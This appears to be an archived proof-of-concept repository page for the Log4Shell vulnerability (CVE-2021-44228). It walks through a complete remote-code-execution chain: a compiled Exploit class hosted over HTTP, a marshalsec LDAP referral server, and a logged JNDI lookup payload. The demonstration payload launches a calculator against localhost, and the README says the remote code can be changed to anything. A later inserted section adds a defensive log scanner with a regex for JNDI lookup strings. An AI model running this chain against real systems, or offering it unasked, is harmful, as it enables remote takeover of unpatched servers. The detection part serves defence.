POC details: 59c27a4f6871d878bcd1d43094b411dbe615a41f

Source
Associated vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j; when that request is written to the log, remote code execution is triggered.
Description
POC for Infamous Log4j CVE-2021-44228
Introduction
# CVE-2021-44228-Log4Shell-POC
### Complete POC for Infamous Log4j CVE-2021-44228


#### Prerequisites
- Download and Install Java from [here](http://mirrors.rootpei.com/jdk/), you can use jdk-8u181.
- Install IntelliJ Idea from [here](https://www.jetbrains.com/idea/)

#### POC

- Step 1 : Clone this repository.
- Step 2 : Move the `Exploit.java` file to a different folder. In my case I created a folder `rce` inside the home directory: `/home/coldfusionx/rce`

![mov](images/mov.png)

- Step 3 : Peeking at `Exploit.java`
Here you can change the remote code to anything; in this case it pops up `gnome-calculator` on an Ubuntu machine.

![exp](images/exp.png)

- Step 4 : Next we need to compile `Exploit.java` with the command `javac Exploit.java`. Once it compiles successfully we should see a new file `Exploit.class` created.

![com](images/com.png)

- Step 5 : Start a Python HTTP server to host `Exploit.class` using `python3 -m http.server 8888`. Alternatively you can use a PHP server with the command `php -S 127.0.0.1:8888`.

![sv](images/sv.png)

- Step 6 : Load the project files into IntelliJ Idea and let Maven complete the file indexing.
Once completed, your project should look like this:

![poc1](images/poc1.PNG)

- Step 7 : To run the project we need to create a run configuration: click on `Add Configuration`

![poc2](images/poc2.png)

    1. Select `Application`

![poc3](images/poc3.png)

    2. Select the main class

![main](images/main.png)

    3. Select the JDK and apply.

![poc4](images/poc4.png)

    4. You should see the Log4j Application created, ready to run.

![poc5](images/poc5.png)

- Step 8 : Next we start the LDAPRefServer using marshalsec:
- `cd marshalsec`
- Run `java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"` to start the LDAP server. Here `127.0.0.1:8888` is the Python server hosting `Exploit.class`, hence the `/#Exploit` suffix.

![ldap](images/ldap.png)

- Step 9 : Edit the JNDI payload in `log4j.java` as per your requirement: `logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");`
In this case we are loading the remote class `Exploit`; the LDAP referral server redirects the request to our Python server hosting the malicious `Exploit` class.

- Step 10 : Run `Log4j`. On a successful run you should see a GNOME calculator pop up.

![rce](images/rce.png)
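From the defender's side, the string logged in Step 9 is exactly what a log scanner should flag. The following is an added example (not code from this repository): it scans constructed log lines for `${jndi:<scheme>://host:port/path}` lookups, as the `logger.error` call above would write them, and lists the callback endpoints that would need checking in egress or DNS logs. Sample lines, scheme list and function names are my own assumptions.

```python
import re
from typing import Dict, List

# Case-insensitive match for a Log4j JNDI lookup string. The scheme list is an
# assumption covering the commonly reachable JNDI providers; host/port/path are
# captured so the callback target can be correlated with network logs.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns)\s*:"
    r"//(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)

# Constructed sample log lines (not real traffic). Line 2 mirrors the payload
# from Step 9; line 4 carries a lookup inside a User-Agent value.
SAMPLE_LOG = """\
2021-12-15 10:01:02 INFO  [main] Application started on port 8080
2021-12-15 10:01:07 ERROR [http-nio-8080-exec-1] ${jndi:ldap://127.0.0.1:1389/Exploit}
2021-12-15 10:01:09 INFO  [http-nio-8080-exec-2] GET /index.html 200 ua="Mozilla/5.0"
2021-12-15 10:01:11 WARN  [http-nio-8080-exec-3] GET /login 404 ua="${JNDI:rmi://10.0.0.5:1099/a}"
"""


def find_jndi_lookups(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per JNDI lookup string found in the log text."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in JNDI_LOOKUP.finditer(line):
            findings.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": m.group("port") or "",
                "path": m.group("path"),
                "raw": m.group(0),
            })
    return findings


def callback_endpoints(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct host:port values the lookups would contact; a connection to one of
    these in firewall or DNS logs turns a logged string into a confirmed callback."""
    return sorted({f"{f['host']}:{f['port'] or '?'}" for f in findings})


if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG)
    for f in hits:
        print(f"line {f['line']}: {f['scheme']} lookup to {f['host']}:{f['port']} path {f['path']}")
    print("endpoints to check in egress/DNS logs:", callback_endpoints(hits))
```

A match on the raw string is only a coarse signal; the fix remains upgrading Log4j to a release that removes the lookup behaviour.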

### Check out my detailed analysis on [Log4Shell CVE-2021-44228](https://blog.qualys.com/vulnerabilities-threat-research/2021/12/15/is-your-web-application-exploitable-by-log4shell-cve-2021-44228-vulnerability)

#### Reference
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228

File snapshot

```
[4.0K] /data/pocs/59c27a4f6871d878bcd1d43094b411dbe615a41f
├── [4.0K] images
│   ├── [ 15K] com.png
│   ├── [ 86K] exp.png
│   ├── [ 14K] ldap.png
│   ├── [ 58K] main.png
│   ├── [ 31K] mov.png
│   ├── [188K] poc1.PNG
│   ├── [ 91K] poc2.png
│   ├── [ 53K] poc3.png
│   ├── [ 52K] poc4.png
│   ├── [ 90K] poc5.png
│   ├── [255K] rce.png
│   └── [9.9K] sv.png
├── [1.0K] LICENSE
├── [4.0K] marshalsec
│   └── [ 41M] marshalsec-0.0.3-SNAPSHOT-all.jar
├── [1008] pom.xml
├── [4.0K] rce
│   └── [ 266] Exploit.java
├── [2.6K] README.md
└── [4.0K] src
    └── [4.0K] main
        └── [4.0K] java
            └── [ 432] log4j.java

6 directories, 18 files
```